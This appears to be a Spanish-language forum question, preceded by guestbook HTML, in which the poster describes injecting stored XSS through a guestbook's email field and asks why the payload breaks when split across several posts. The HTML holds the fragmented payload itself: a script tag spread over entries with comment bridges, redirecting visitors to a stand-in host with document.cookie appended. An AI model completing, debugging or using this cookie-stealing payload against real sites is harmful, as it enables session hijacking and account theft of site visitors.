<a href='mailto:</a><script>/*'></a><script>/*</a>:
<br>
<hr>
<a href='mailto:*/location.href=/*'>*/location.href=/*</a>:
<br>
<hr>
<a href='mailto:*/"http://127.0.0.1/"/*'>*/"http://127.0.0.1/"/*</a>:
<br>
<hr>
<a href='mailto:*/+document.cookie;/*'>*/+document.cookie;/*</a>:
<br>
<hr>
<a href='mailto:*/</script><a>'>*/</script><a></a>
Estoy inyectando en la configuración de un libro de visitas donde se inyecta el XSS cambiando la dirección de correo electrónico. La longitud máxima del correo electrónico es lo suficientemente corta como para que tenga que extenderme en varias publicaciones. Al probar, soy capaz de ejecutar alerta (1); pero cuando tengo que extender una expresión más complicada sobre varias líneas, las cosas se rompen. ¿Qué me estoy perdiendo?